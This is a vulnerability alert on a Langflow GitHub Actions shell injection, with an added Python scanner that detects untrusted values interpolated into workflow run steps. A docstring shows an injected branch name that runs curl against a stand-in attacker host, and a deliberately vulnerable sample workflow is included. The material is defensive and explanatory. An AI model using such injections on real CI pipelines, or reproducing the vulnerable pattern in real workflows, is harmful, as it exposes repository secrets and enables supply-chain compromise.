
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub…

Published:

23 March 2026 at 23:00:00

Alert date:

24 March 2026 at 20:06:33

Source:

nvd.nist.gov


Supply Chain & Dependencies, Web Technologies

An unauthenticated remote shell injection vulnerability exists in Langflow's GitHub Actions workflows prior to version 1.9.0. Several workflow files interpolate attacker-controlled GitHub context values, such as the head branch name or the pull request title, directly into shell `run:` steps without sanitization. Because `${{ ... }}` expressions are expanded by GitHub before the shell parses the script, an attacker who opens a pull request or pushes a branch with a crafted name or title can terminate the intended command and run arbitrary shell commands on the CI runner, without any authentication to the repository beyond what is needed to open the pull request. The injected commands run with the workflow's privileges, giving access to CI secrets such as GITHUB_TOKEN and enabling secret exfiltration, infrastructure manipulation, and supply chain compromise during CI/CD execution. Version 1.9.0 patches the issue by properly sanitizing user-controlled input before it reaches the shell.
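The injection pattern described above is mechanical enough to scan for. The following is an added example (not Langflow's code and not the advisory's proof of concept) that walks a workflow file line by line, finds every `${{ ... }}` expression inside a `run:` step, and flags those that reference a context an outside contributor controls. The list of untrusted contexts is an illustrative subset assumed from GitHub's documented context names, and both sample workflows are constructed for this example; the hardened variant uses the mitigation GitHub's own security guidance recommends, passing the value through an `env:` mapping and quoting it in the shell, which is a general fix and not necessarily the exact change shipped in Langflow 1.9.0.

```python
"""Added example: scan GitHub Actions workflow text for attacker-controlled
context values interpolated into `run:` steps, the pattern behind the Langflow
CI shell injection. Not Langflow's code; the sample workflows are constructed."""
import re

# Contexts an outside contributor controls by pushing a branch or opening a
# pull request. Illustrative subset (assumption), extend as needed.
UNTRUSTED_CONTEXTS = (
    "github.head_ref",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.comment.body",
    "github.event.commits",
    "github.event.head_commit.message",
    "github.event.workflow_run.head_branch",
)

EXPR_RE = re.compile(r"\$\{\{(.*?)\}\}")           # ${{ expression }}
RUN_RE = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")  # a `run:` key, list item or not
UNTRUSTED_RE = re.compile(
    "|".join(r"(?<![\w.])" + re.escape(c) + r"(?![\w-])" for c in UNTRUSTED_CONTEXTS)
)


def find_run_injections(workflow_text):
    """Return (line_number, expression) for every `${{ }}` expression inside a
    `run:` step that references an untrusted context. GitHub expands the
    expression before the shell parses the script, so a branch named
    x"; curl attacker.site; # becomes shell code in the step."""
    findings = []
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        # Sibling keys of the step (env:, with:, ...) sit at the indent of the
        # `run:` key itself (after any `- `); block-scalar body lines are deeper.
        key_indent = len(m.group(1)) + len(m.group(2) or "")
        rest = m.group(3).strip()
        if rest.startswith(("|", ">")):          # run: |  (multi-line script)
            body, j = [], i + 1
            while j < len(lines):
                ln = lines[j]
                if ln.strip() and len(ln) - len(ln.lstrip()) <= key_indent:
                    break
                body.append((j + 1, ln))
                j += 1
            i = j
        else:                                    # run: single command
            body, i = [(i + 1, rest)], i + 1
        for lineno, text in body:
            for expr in EXPR_RE.findall(text):
                expr = expr.strip()
                if UNTRUSTED_RE.search(expr):
                    findings.append((lineno, expr))
    return findings


# Constructed vulnerable workflow: PR title / branch name land in the shell.
# pull_request_target runs with the base repository's secrets (GitHub behaviour).
VULNERABLE_WORKFLOW = """\
name: ci
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Announce
        run: |
          echo "Building ${{ github.head_ref }}"
          echo "PR: ${{ github.event.pull_request.title }}"
        env:
          NOT_A_RUN_LINE: ${{ github.event.pull_request.body }}
      - run: echo "${{ github.event.pull_request.body }}"
"""

# Constructed hardened workflow: untrusted values enter only via env: and are
# referenced as quoted shell variables, so the shell never parses them as code.
HARDENED_WORKFLOW = """\
name: ci
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Announce
        env:
          HEAD_REF: ${{ github.head_ref }}
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Building $HEAD_REF"
          echo "PR: $PR_TITLE"
"""

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, find_run_injections(wf))
```

The scanner deliberately does not flag expressions in `env:` or `with:` mappings: there the value is handed to the step as data, and it only becomes dangerous if the script later re-evaluates it (for example through `eval`). Run it over `.github/workflows/*.yml` in a repository to get a first pass; a YAML-aware tool will handle unusual indentation and flow-style steps that this line-based version does not.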

Technical details:

Mitigation steps:

Affected products:

Langflow

Related links:

Related CVEs:

Related threat actors:

IOCs:

attacker.site

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: This website displays information originating from external sources. Perceptive accepts no responsibility for the content, accuracy or completeness of this information.
